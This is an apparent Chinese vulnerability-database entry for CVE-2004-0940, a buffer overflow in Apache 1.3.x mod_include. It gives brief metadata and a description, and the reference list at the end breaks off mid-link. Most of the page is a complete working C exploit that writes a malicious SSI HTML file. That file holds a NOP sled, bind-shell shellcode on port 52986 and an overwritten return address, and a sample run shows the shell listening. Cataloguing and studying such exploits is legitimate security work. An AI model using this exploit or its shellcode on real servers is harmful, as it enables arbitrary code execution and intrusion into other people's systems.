Apache mod_include本地缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108226 漏洞类型 缓冲区溢出
发布时间 2004-10-18 更新时间 2006-08-16
CVE编号 CVE-2004-0940 CNNVD-ID CNNVD-200502-029
漏洞平台 Linux CVSS评分 6.9
|漏洞来源
https://www.exploit-db.com/exploits/24694
https://www.securityfocus.com/bid/11471
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200502-029
|漏洞详情
mod_include是Apache标准模块允许用户在HTML中包含文件执行命令等。mod_includeget_tag()对用户提交输入缺少充分过滤,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击。问题是get_tag()函数存在缓冲区溢出问题,攻击者从handle_echo()函数可以触发,本地用户可以建立特殊的HTML,当Apache处理时,可能以httpd子进程权限执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/11471/info

The problem presents itself when the affected module attempts to parse mod_include-specific tag values. A failure to properly validate the lengths of user-supplied tag strings before copying them into finite buffers facilitates the overflow. 

A local attacker may leverage this issue to execute arbitrary code on the affected computer with the privileges of the affected Apache server.

/*********************************************************************************
 local exploit for mod_include of apache 1.3.x                                   *
 written by xCrZx                         /18.10.2004/                           *
 bug found by xCrZx                       /18.10.2004/                           *
                                                                                 *
 y0das old shao lin techniq ownz u :) remember my words                          *
 http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3                            *
                                                                                 *
 Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike)                  *
*********************************************************************************/
 
/*********************************************************************************
 Technical Details:                                                              *
                                                                                 *
 there is an overflow in get_tag function:                                       *
                                                                                 *
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) *
{                                                                                *
...                                                                              *
    term = c;                                                                    *
    while (1) {                                                                  *
        GET_CHAR(in, c, NULL, p);                                                *
[1]        if (t - tag == tagbuf_len) {                                          *
            *t = '\0';                                                           *
            return NULL;                                                         *
        }                                                                        *
// Want to accept \" as a valid character within a string. //                    *
        if (c == '\\') {                                                         *
[2]            *(t++) = c;         // Add backslash //                           *
            GET_CHAR(in, c, NULL, p);                                            *
            if (c == term) {    // Only if //                                    *
[3]                *(--t) = c;     // Replace backslash ONLY for terminator //   *
            }                                                                    *
        }                                                                        *
        else if (c == term) {                                                    *
            break;                                                               *
        }                                                                        *
[4]        *(t++) = c;                                                           *
    }                                                                            *
    *t = '\0';                                                                   *
...                                                                              *
                                                                                 *
as we can see there is a [1] check to determine the end of tag buffer            *
but this check can be skiped when [2] & [4] conditions will be occured           *
at the same time without [3] condition.                                          *
                                                                                 *
So attacker can create malicious file to overflow static buffer, on              *
which tag points out and execute arbitrary code with privilegies of              *
httpd child process.                                                             *
                                                                                 *
Fix:                                                                             *
[1*]        if (t - tag >= tagbuf_len-1) {                                       *
                                                                                 *
Notes: To activate mod_include you need write "XBitHack on" in httpd.conf        *
                                                                                 *
*********************************************************************************/
 
/*********************************************************************************
  Example of work:                                                               *
                                                                                 *
  [root@blacksand htdocs]# make 85mod_include                                    *
  cc     85mod_include.c   -o 85mod_include                                      *
  [root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html                *
  [root@blacksand htdocs]# chmod +x evil.html                                    *
  [root@blacksand htdocs]# netstat -na|grep 52986                                *
  [root@blacksand htdocs]# telnet localhost 8080                                 *
  Trying 127.0.0.1...                                                            *
  Connected to localhost.                                                        *
  Escape character is '^]'.                                                      *
  GET /evil.html HTTP/1.0                                                        *
  ^]                                                                             *
  telnet> q                                                                      *
  Connection closed.                                                             *
  [root@blacksand htdocs]# netstat -na|grep 52986                                *
  tcp        0      0 0.0.0.0:52986           0.0.0.0:*               LISTEN     *
  [root@blacksand htdocs]#                                                       *
*********************************************************************************/
 
/*********************************************************************************
  Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always                  *
*********************************************************************************/
 
/*********************************************************************************
  Personal hello to my parents :)                                                *
*********************************************************************************/
 
/*********************************************************************************
 Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz           *
*********************************************************************************/
 
 
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
 
#define EVILBUF 8202
#define HTMLTEXT 1000
 
#define HTML_FORMAT "<html>\n<!--#echo done=\"%s\" -->\nxCrZx 0wn U\n</
html>"
 
#define AUTHOR "\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\n"

 
int main(int argc, char **argv) {
 
	char html[EVILBUF+HTMLTEXT];
	char evilbuf[EVILBUF+1];
 
	//can be changed
	char shellcode[] =
 
    // bind shell on 52986 port 
    "\x31\xc0"
    "\x31\xdb\x53\x43\x53\x89\xd8\x40\x50\x89\xe1\xb0\x66\xcd\x80\x43"
    "\x66\xc7\x44\x24\x02\xce\xfa\xd1\x6c\x24\x04\x6a\x10\x51\x50\x89"
    "\xe1\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x43\x89\x61\x08\xb0"
    "\x66\xcd\x80\x93\x31\xc9\xb1\x03\x49\xb0\x3f\xcd\x80\x75\xf9\x68"
    "\x2f\x73\x68\x20\x68\x2f\x62\x69\x6e\x88\x4c\x24\x07\x89\xe3\x51"
    "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
 
    //execve /tmp/sh <- your own program
   /*
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
    "\xc0\x88\x43\x07\x89\x5b\x08\x89"
    "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
    "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
    "/tmp/sh";
   */
 
 
	char NOP[] = "\x90\x40";             // special nops ;)
	char evilpad[] = "\\CRZCRZCRZCRZC";  // trick ;)
 
	int padding,xpad=0;
	int i,fd;
	long ret=0xbfff8688;
 
	if(argc>1) ret=strtoul(argv[1],0,16);
	else { fprintf(stderr,AUTHOR"\nUsage: %s <RET ADDR> > file.html\n\n",argv[0]);exi
t(0); }
 
	padding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);
 
	while(1) {
		if(padding%2==0) { padding/=2; break;}
		else {padding--;xpad++;}
	}
 
	memset(html,0x0,sizeof html);
	memset(evilbuf,0x0,sizeof evilbuf);
 
	for(i=0;i<padding;i++)
		memcpy(evilbuf+strlen(evilbuf),&NOP,2);
	for(i=0;i<xpad;i++)
		memcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);

 
	memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);
	memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);
	*(long*)&evilbuf[strlen(evilbuf)]=ret;
 
	sprintf(html,HTML_FORMAT,evilbuf);
 
	printf("%s",html);
 
	return 0;
}
|受影响的产品
Trustix Secure Linux 1.5 SuSE Linux 8.1 SuSE Linux 8.0 Sun Solaris 9_x86 Sun Solaris 9 Sun Solaris 8_x86 Sun Solaris 8_sparc Slackware L
|参考资料

来源:BID
名称:11471
链接:http://www.securityfocus.com/bid/11471
来源:OPENPKG
名称:OpenPKG-SA-2004.047
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109906660225051&w=2
来源:XF
名称:apache-modinclude-bo(17785)
链接:http://xforce.iss.net/xforce/xfdb/17785
来源:REDHAT
名称:RHSA-2005:816
链接:http://www.redhat.com/support/errata/RHSA-2005-816.html
来源:REDHAT
名称:RHSA-2004:600
链接:http://www.redhat.com/support/errata/RHSA-2004-600.html
来源:MANDRAKE
名称:MDKSA-2004:134
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2004:134
来源:VUPEN
名称:ADV-2006-0789
链接:http://www.frsirt.com/english/advisories/2006/0789
来源:DEBIAN
名称:DSA-594
链接:http://www.debian.org/security/2004/dsa-594
来源:www.apacheweek.com
链接:http://www.apacheweek.com/features/security-13
来源:support.avaya.com
链接:http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
来源:SUNALERT
名称:102197
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-26-102197-1
来源:SECTRACK
名称:1011783
链接:http://securitytracker.com/id?1011783
来源:SECUNIA
名称:19073
链接:http://sec